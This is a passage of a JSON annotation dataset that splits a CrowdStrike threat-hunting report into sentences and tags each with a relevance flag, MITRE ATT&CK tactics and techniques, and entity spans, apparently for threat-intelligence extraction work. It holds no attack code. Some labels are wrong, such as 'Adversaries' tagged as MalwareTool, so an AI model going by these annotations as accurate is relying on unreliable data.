hands-on- keyboard tactics to achieve their objectives, threat hunting operations must be informed by today’s best threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s28-c38bad", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 28, "context_before": "In a time when adversaries increasingly rely on hands-on- keyboard tactics to achieve their objectives, threat hunting operations must be informed by today’s best threat intelligence.", "sentence_text": "The new Counter Adversary Operations team will relentlessly track, detect and ultimately disrupt the adversary no matter when or where they operate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s29-f4abe9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 29, "context_before": "The new Counter Adversary Operations team will relentlessly track, detect and ultimately disrupt the adversary no matter when or where they operate.", "sentence_text": "Adam Meyers\nSVP of Intelligence", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p4-s30-b6ca30", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 4, "sentence_id": 30, "context_before": "Adam Meyers\nSVP of Intelligence", "sentence_text": "NOWHERE TO HIDE 4 Contents Foreword 2 Introduction 5 Front-Line Snapshot 6 Front-Line Observations 10 Î Adversaries Advance the Frontier of Identity Threats 10 ³ Don’t Get Burned by Kerberoasting 11 ³ Beyond Usernames and Passwords 16 ³ Spotlight: Falcon OverWatch Identifies Missing MITRE Identity Technique 18 Î Left of Theft: Themes of Early-Stage eCrime 20 ³ INDRIK SPIDER Brings the Tailored Experience to Opportunistic eCrime 21 ³ Access Brokers Abuse Vulnerabilities for Initial Access 23 ³ Remote Monitoring and Management Tools 26 Î Adversaries Lead the Charge in Cloud Know-How 32 ³ Adversaries Leverage LinPEAS Tool for Cloud Discovery 32 ³ eCrime Adversaries Use Azure Run Commands to Deploy Malware 35 ³ Compromised Cloud Credentials Facilitate Widespread Lateral Movement 37 Î Cross-Platform Proficiency Takes Center Stage 38 ³ Linux Insights and Trends 39 ³ macOS Insights and Trends", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s31-8756d1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 31, "context_before": "NOWHERE TO HIDE 4 Contents Foreword 2 Introduction 5 Front-Line Snapshot 6 Front-Line Observations 10 Î Adversaries Advance the Frontier of Identity Threats 10 ³ Don’t Get Burned by Kerberoasting 11 ³ Beyond Usernames and Passwords 16 ³ Spotlight: Falcon OverWatch Identifies Missing MITRE Identity Technique 18 Î Left of Theft: Themes of Early-Stage eCrime 20 ³ INDRIK SPIDER Brings the Tailored Experience to Opportunistic eCrime 21 ³ Access Brokers Abuse Vulnerabilities for Initial Access 23 ³ Remote Monitoring and Management Tools 26 Î Adversaries Lead the Charge in Cloud Know-How 32 ³ Adversaries Leverage LinPEAS Tool for Cloud Discovery 32 ³ eCrime Adversaries Use Azure Run Commands to Deploy Malware 35 ³ Compromised Cloud Credentials Facilitate Widespread Lateral Movement 37 Î Cross-Platform Proficiency Takes Center Stage 38 ³ Linux Insights and Trends 39 ³ macOS Insights and Trends", "sentence_text": "NOWHERE TO HIDE 5 Introduction Identity threats emerged as the major theme of interactive — aka hands-on-keyboard — intrusions discovered by the CrowdStrike® Falcon OverWatch™ threat hunting team in the past 12 months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s32-87c326", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 32, "context_before": "NOWHERE TO HIDE 5 Introduction Identity threats emerged as the major theme of interactive — aka hands-on-keyboard — intrusions discovered by the CrowdStrike® Falcon OverWatch™ threat hunting team in the past 12 months.", "sentence_text": "In all aspects of operations, adversaries looked for ways to broaden their reach, optimize their tradecraft and deepen their impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s33-a1a956", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 33, "context_before": "In all aspects of operations, adversaries looked for ways to broaden their reach, optimize their tradecraft and deepen their impact.", "sentence_text": "These operations often started with an identity compromise.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "operations start with identity compromise", "entities": [ { "text": "identity compromise.", "start": 39, "end": 59, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s34-a6a9d9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 34, "context_before": "These operations often started with an identity compromise.", "sentence_text": "Adversaries are not relying solely on compromised valid credentials, either — rather, they demonstrated their capacity to abuse all forms of identification and authorization, including weak credentials purchased from the underground, and they elevated their phishing and social engineering tradecraft.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1589.001", "name": "Credentials" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "adversaries elevated their phishing and social engineering", "entities": [ { "text": "elevated their phishing and social engineering", "start": 243, "end": 289, "label": "Action" }, { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "compromised valid credentials", "start": 38, "end": 67, "label": "Infrastructure_Indicator" }, { "text": " weak credentials", "start": 184, "end": 201, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s35-94f98c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 35, "context_before": "Adversaries are not relying solely on compromised valid credentials, either — rather, they demonstrated their capacity to abuse all forms of identification and authorization, including weak credentials purchased from the underground, and they elevated their phishing and social engineering tradecraft.", "sentence_text": "In addition to the broad targeting of identity, several trends stood out this year related to eCrime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s36-428098", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 36, "context_before": "In addition to the broad targeting of identity, several trends stood out this year related to eCrime.", "sentence_text": "First, the continued exploitation of vulnerable software to gain access, particularly in the case of access brokers,1 demonstrates the need for organizations to have visibility into their external attack surface.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation of vulnerable software", "entities": [ { "text": "exploitation of vulnerable software to gain access", "start": 21, "end": 71, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s37-158802", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 37, "context_before": "First, the continued exploitation of vulnerable software to gain access, particularly in the case of access brokers,1 demonstrates the need for organizations to have visibility into their external attack surface.", "sentence_text": "The expanded use of zero-day vulnerabilities and the speed at which threat actors were able to develop N-day exploits underscore the importance of vulnerability management and patching.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s38-25282e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 38, "context_before": "The expanded use of zero-day vulnerabilities and the speed at which threat actors were able to develop N-day exploits underscore the importance of vulnerability management and patching.", "sentence_text": "Second, the rampant use of legitimate remote monitoring and management (RMM)\ntools illustrates adversaries’ attempts to blend into enterprise noise and avoid detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" }, { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "adversaries use legitimate RMM tools", "entities": [ { "text": "use of legitimate remote monitoring and management (RMM)\ntools", "start": 20, "end": 82, "label": "Action" }, { "text": "attempts to blend into enterprise noise and avoid detection", "start": 108, "end": 167, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s39-b2a446", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 39, "context_before": "Second, the rampant use of legitimate remote monitoring and management (RMM)\ntools illustrates adversaries’ attempts to blend into enterprise noise and avoid detection.", "sentence_text": "Finally, Falcon OverWatch observed adversaries such as INDRIK SPIDER following their otherwise opportunistic initial access attempts with more tailored follow-on behaviors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s40-c0122d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 40, "context_before": "Finally, Falcon OverWatch observed adversaries such as INDRIK SPIDER following their otherwise opportunistic initial access attempts with more tailored follow-on behaviors.", "sentence_text": "Consistent with the expectations outlined in last year’s report, Falcon OverWatch observed adversaries’ increased proficiency in attacks against cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s41-c21b75", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 41, "context_before": "Consistent with the expectations outlined in last year’s report, Falcon OverWatch observed adversaries’ increased proficiency in attacks against cloud environments.", "sentence_text": "In the past few months, adversaries have continued to demonstrate that they are adept at navigating all major cloud platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s42-84044f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 42, "context_before": "In the past few months, adversaries have continued to demonstrate that they are adept at navigating all major cloud platforms.", "sentence_text": "In particular, adversaries have been quick to learn how to take advantage of common misconfigurations or abuse the built-in cloud management tooling.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "adversaries exploit misconfigurations and built in cloud management tooling", "entities": [ { "text": "adversaries ", "start": 15, "end": 27, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s43-5c88d3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 43, "context_before": "In particular, adversaries have been quick to learn how to take advantage of common misconfigurations or abuse the built-in cloud management tooling.", "sentence_text": "The concerning reality is that some adversaries appear to have a better handle on victims’ cloud environments than the organizations themselves.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s44-a1c0b7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 44, "context_before": "The concerning reality is that some adversaries appear to have a better handle on victims’ cloud environments than the organizations themselves.", "sentence_text": "Finally, cross-platform proficiency is a hallmark of this year’s interactive intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s45-ce7c96", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 45, "context_before": "Finally, cross-platform proficiency is a hallmark of this year’s interactive intrusions.", "sentence_text": "Exemplified by the 3CX supply chain attack perpetrated by LABYRINTH CHOLLIMA — and uncovered by CrowdStrike — many of today’s adversaries are able to confidently navigate multiple operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s46-0a27da", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 46, "context_before": "Exemplified by the 3CX supply chain attack perpetrated by LABYRINTH CHOLLIMA — and uncovered by CrowdStrike — many of today’s adversaries are able to confidently navigate multiple operating systems.", "sentence_text": "Whether the adversary is leveraging native applications or cross-platform development tools, the need to be flexible and adapt to any target environment is paramount to continued operational success.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s47-cfb75f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 47, "context_before": "Whether the adversary is leveraging native applications or cross-platform development tools, the need to be flexible and adapt to any target environment is paramount to continued operational success.", "sentence_text": "The findings relate specifically to interactive intrusion activity — that is, activity where a threat actor was operating with hands-on-keyboard in a victim environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s48-e79999", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 48, "context_before": "The findings relate specifically to interactive intrusion activity — that is, activity where a threat actor was operating with hands-on-keyboard in a victim environment.", "sentence_text": "Targeted adversaries refer to state-nexus adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p5-s49-cd31cf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 5, "sentence_id": 49, "context_before": "Targeted adversaries refer to state-nexus adversaries.", "sentence_text": "Access brokers are threat actors that specialize in breaching networks with the intention of selling or providing that access to others.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p6-s50-709248", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 6, "sentence_id": 50, "context_before": "Access brokers are threat actors that specialize in breaching networks with the intention of selling or providing that access to others.", "sentence_text": "NOWHERE TO HIDE 6 Front-Line Snapshot", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p6-s51-9d06e1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 6, "sentence_id": 51, "context_before": "NOWHERE TO HIDE 6 Front-Line Snapshot", "sentence_text": "The overall distribution of interactive intrusion activity by threat type remained relatively constant this year compared to previous years, with a small decrease in the proportion of targeted intrusion activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p6-s52-6f0b4e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 6, "sentence_id": 52, "context_before": "The overall distribution of interactive intrusion activity by threat type remained relatively constant this year compared to previous years, with a small decrease in the proportion of targeted intrusion activity.", "sentence_text": "For the sixth consecutive year, the technology vertical topped the list for the most frequently targeted industry vertical.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s53-2be606", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 53, "context_before": "For the sixth consecutive year, the technology vertical topped the list for the most frequently targeted industry vertical.", "sentence_text": "NOWHERE TO HIDE 7 TOP 10 VERTICALS BY INTRUSION FREQUENCY TargetedTOP FIVEIntrusionVERTICALSvs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s54-7dc130", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 54, "context_before": "NOWHERE TO HIDE 7 TOP 10 VERTICALS BY INTRUSION FREQUENCY TargetedTOP FIVEIntrusionVERTICALSvs.", "sentence_text": "eCrimeBYActivityINTRUSION|", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s55-d273e4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 55, "context_before": "eCrimeBYActivityINTRUSION|", "sentence_text": "July 2022FREQUENCYto June 2023 July 2022 to June 2023 Targeted Intrusions TECHNOLOGY 21% TECHNOLOGY FINANCIAL TELECOMMUNICATIONS 17% RETAIL GOVERNMENT 13% HEALTHCARE FINANCIAL 11% TELECOMMUNICATIONS SERVICES 7% SERVICES 0% 5% 10% 15% 20% 25% eCrime Intrusions MANUFACTURING Change in relative TECHNOLOGY 21% ACADEMIC frequencyto July 2021comparedto June 2022 10% RETAIL GOVERNMENT 2023 (%) HEALTHCARE 9% 2022 (%)\nREAL ESTATE MANUFACTURING 8% FINANCIAL 7% 0% 5% 10% 15% 20% 25% 0% 5% 10% 15% 20% 25% July 2022 to June 2023 adversary threat type, July 2022 to June 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s56-706b59", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 56, "context_before": "July 2022FREQUENCYto June 2023 July 2022 to June 2023 Targeted Intrusions TECHNOLOGY 21% TECHNOLOGY FINANCIAL TELECOMMUNICATIONS 17% RETAIL GOVERNMENT 13% HEALTHCARE FINANCIAL 11% TELECOMMUNICATIONS SERVICES 7% SERVICES 0% 5% 10% 15% 20% 25% eCrime Intrusions MANUFACTURING Change in relative TECHNOLOGY 21% ACADEMIC frequencyto July 2021comparedto June 2022 10% RETAIL GOVERNMENT 2023 (%) HEALTHCARE 9% 2022 (%)\nREAL ESTATE MANUFACTURING 8% FINANCIAL 7% 0% 5% 10% 15% 20% 25% 0% 5% 10% 15% 20% 25% July 2022 to June 2023 adversary threat type, July 2022 to June 2023", "sentence_text": "In the past year, the volume of interactive intrusion activity against the financial services industry increased by over 80%.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s57-12842f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 57, "context_before": "In the past year, the volume of interactive intrusion activity against the financial services industry increased by over 80%.", "sentence_text": "Defenders in the financial industry should watch this trend closely, as the increased volume of activity is matched by an increased diversity of threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s58-11a296", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 58, "context_before": "Defenders in the financial industry should watch this trend closely, as the increased volume of activity is matched by an increased diversity of threats.", "sentence_text": "This year, Falcon OverWatch uncovered activity in the financial industry spanning all adversary motivation types and targeting all three major operating systems as well as cloud infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s59-4453b9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 59, "context_before": "This year, Falcon OverWatch uncovered activity in the financial industry spanning all adversary motivation types and targeting all three major operating systems as well as cloud infrastructure.", "sentence_text": "North Korean adversaries are the most aggressive state-sponsored adversaries to target the financial sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s60-de8227", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 60, "context_before": "North Korean adversaries are the most aggressive state-sponsored adversaries to target the financial sector.", "sentence_text": "They continue to engage in prolific, financially motivated operations primarily targeting financial and financial technology (fintech) organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s61-bacda4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 61, "context_before": "They continue to engage in prolific, financially motivated operations primarily targeting financial and financial technology (fintech) organizations.", "sentence_text": "eCrime threat actors also routinely target the financial sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s62-32dd45", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 62, "context_before": "eCrime threat actors also routinely target the financial sector.", "sentence_text": "Though some adversaries focus on stealing cryptocurrency or non-fungible tokens (NFTs), opportunistic big game hunting (BGH) ransomware and data theft campaigns remain the primary eCrime threat to financial institutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p7-s63-1ea368", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 7, "sentence_id": 63, "context_before": "Though some adversaries focus on stealing cryptocurrency or non-fungible tokens (NFTs), opportunistic big game hunting (BGH) ransomware and data theft campaigns remain the primary eCrime threat to financial institutions.", "sentence_text": "Due to the victim organization's need to maintain system uptime and the sensitive nature of the sector, eCrime threat actors likely conclude that financial institutions are willing and able to pay ransom demands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s64-cbf0c3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 64, "context_before": "Due to the victim organization's need to maintain system uptime and the sensitive nature of the sector, eCrime threat actors likely conclude that financial institutions are willing and able to pay ransom demands.", "sentence_text": "NOWHERE TO HIDE 8 BEAR CHOLLIMA JACKAL KITTEN PANDA SPIDER WOLF RUSSIA N. KOREA HACKTIVIST IRAN CHINA ECRIME TURKEY Academic Agriculture Consulting Energy Engineering Financial Government Healthcare Hospitality Insurance Legal Manufacturing Media Mining Nonprofit Pharmaceutical Real Estate Retail Services Technology Telecommunications Transportation and Logistics Please note the following about the data presented in this heat map:\n¼ The heat mapping represents the number of distinct adversaries active within a particular vertical ¼ The heat mapping does not represent the total number of intrusion attempts within a vertical, as multiple intrusions by the same adversary group are represented only once ¼ Attribution to a high degree of confidence is not always possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s65-839f77", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 65, "context_before": "NOWHERE TO HIDE 8 BEAR CHOLLIMA JACKAL KITTEN PANDA SPIDER WOLF RUSSIA N. KOREA HACKTIVIST IRAN CHINA ECRIME TURKEY Academic Agriculture Consulting Energy Engineering Financial Government Healthcare Hospitality Insurance Legal Manufacturing Media Mining Nonprofit Pharmaceutical Real Estate Retail Services Technology Telecommunications Transportation and Logistics Please note the following about the data presented in this heat map:\n¼ The heat mapping represents the number of distinct adversaries active within a particular vertical ¼ The heat mapping does not represent the total number of intrusion attempts within a vertical, as multiple intrusions by the same adversary group are represented only once ¼ Attribution to a high degree of confidence is not always possible.", "sentence_text": "This table does not reflect any unattributed activity that occurred in any industry verticals Targeted intrusion activity during this period notably correlated with the respective intelligence collection requirements and other priorities of each adversary grouping.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s66-b0fc81", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 66, "context_before": "This table does not reflect any unattributed activity that occurred in any industry verticals Targeted intrusion activity during this period notably correlated with the respective intelligence collection requirements and other priorities of each adversary grouping.", "sentence_text": "KITTEN adversaries increasingly rely on opportunistic exploitation of entities of interest, and PANDA adversaries continue to expand operations to achieve coverage across as many targets as possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s67-3c97e8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 67, "context_before": "KITTEN adversaries increasingly rely on opportunistic exploitation of entities of interest, and PANDA adversaries continue to expand operations to achieve coverage across as many targets as possible.", "sentence_text": "The technology sector continues to be a high-value target for eCrime adversaries, with BGH operations posing the most prevalent eCrime threat to the sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s68-cdb8cd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 68, "context_before": "The technology sector continues to be a high-value target for eCrime adversaries, with BGH operations posing the most prevalent eCrime threat to the sector.", "sentence_text": "The technology sector’s reliance on and access to highly sensitive data make it an especially attractive target for BGH operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s69-0d6fc5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 69, "context_before": "The technology sector’s reliance on and access to highly sensitive data make it an especially attractive target for BGH operators.", "sentence_text": "BGH operations continue to rely on ransomware and data theft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p8-s70-76270f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 8, "sentence_id": 70, "context_before": "BGH operations continue to rely on ransomware and data theft.", "sentence_text": "Other prominent eCrime threats to the technology sector include enabling services, access brokers and information theft campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s71-befda2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 71, "context_before": "Other prominent eCrime threats to the technology sector include enabling services, access brokers and information theft campaigns.", "sentence_text": "NOWHERE TO HIDE 9 MITRE ATT&CK HEAT MAP - TOP FIVE TECHNIQUES ACROSS EACH TACTIC AREA INITIAL ACCESS EXECUTION", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s72-1f8fb9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 72, "context_before": "NOWHERE TO HIDE 9 MITRE ATT&CK HEAT MAP - TOP FIVE TECHNIQUES ACROSS EACH TACTIC AREA INITIAL ACCESS EXECUTION", "sentence_text": "PERSISTENCE PRIVILEGE ESCALATION Valid Accounts CommandInterpreter and Scripting Valid Accounts Valid Accounts", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s73-75da55", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 73, "context_before": "PERSISTENCE PRIVILEGE ESCALATION Valid Accounts CommandInterpreter and Scripting Valid Accounts Valid Accounts", "sentence_text": "Software Management Server Exploit Public-Facing Windows Process Injection Component Instrumentation Application External Remote System Services Create Account CreateSystemorProcessModify Services Phishing Scheduled Task/Job Account Manipulation Scheduled Task/Job Trusted Relationship Shared Modules CreateProcessor Modify System AbuseControlElevationMechanism DEFENSE EVASION CREDENTIAL ACCESS DISCOVERY LATERAL MOVEMENT Valid Accounts OS Credential Dumping SystemDiscoveryOwner/User Remote Services System Network Indicator Removal Unsecured Credentials Configuration Discovery Lateral Tool Transfer Impair Defenses Brute Force Account Discovery ExploitationServices of Remote Obfuscated Files or Credentials Information Password Stores from Remote System Discovery RemoteHijackingService Session Masquerading StealKerberosor ForgeTickets SystemDiscoveryInformation SoftwareTools Development COLLECTION COMMAND & CONTROL EXFILTRATION IMPACT Archive Collection Data Ingress Tool Transfer ExfiltrationProtocol Over Alternative Data Encrypted for Impact Data Staged Application Layer Protocol Exfiltration Over Web Service Service Stop Data from Local System Remote Access Software Exfiltration Over C2 Channel Inhibit System Recovery Screen Capture Non-Standard Port Automated Exfiltration System Shutdown/Reboot Data from Network Shared Proxy Data Transfer Size Limits Resource Hijacking Drive adversaries use in each tactic area, June 2022 to July 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s74-8887cf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 74, "context_before": "Software Management Server Exploit Public-Facing Windows Process Injection Component Instrumentation Application External Remote System Services Create Account CreateSystemorProcessModify Services Phishing Scheduled Task/Job Account Manipulation Scheduled Task/Job Trusted Relationship Shared Modules CreateProcessor Modify System AbuseControlElevationMechanism DEFENSE EVASION CREDENTIAL ACCESS DISCOVERY LATERAL MOVEMENT Valid Accounts OS Credential Dumping SystemDiscoveryOwner/User Remote Services System Network Indicator Removal Unsecured Credentials Configuration Discovery Lateral Tool Transfer Impair Defenses Brute Force Account Discovery ExploitationServices of Remote Obfuscated Files or Credentials Information Password Stores from Remote System Discovery RemoteHijackingService Session Masquerading StealKerberosor ForgeTickets SystemDiscoveryInformation SoftwareTools Development COLLECTION COMMAND & CONTROL EXFILTRATION IMPACT Archive Collection Data Ingress Tool Transfer ExfiltrationProtocol Over Alternative Data Encrypted for Impact Data Staged Application Layer Protocol Exfiltration Over Web Service Service Stop Data from Local System Remote Access Software Exfiltration Over C2 Channel Inhibit System Recovery Screen Capture Non-Standard Port Automated Exfiltration System Shutdown/Reboot Data from Network Shared Proxy Data Transfer Size Limits Resource Hijacking Drive adversaries use in each tactic area, June 2022 to July 2023", "sentence_text": "Falcon OverWatch tracks interactive intrusion activity against the MITRE ATT&CK® Enterprise Matrix, a framework that categorizes and tracks adversary behavior.3 This heat map illustrates the top five techniques observed across the interactive intrusion activity discovered by Falcon OverWatch in each tactic area during the past year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p9-s75-dd646a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 9, "sentence_id": 75, "context_before": "Falcon OverWatch tracks interactive intrusion activity against the MITRE ATT&CK® Enterprise Matrix, a framework that categorizes and tracks adversary behavior.3 This heat map illustrates the top five techniques observed across the interactive intrusion activity discovered by Falcon OverWatch in each tactic area during the past year.", "sentence_text": "The 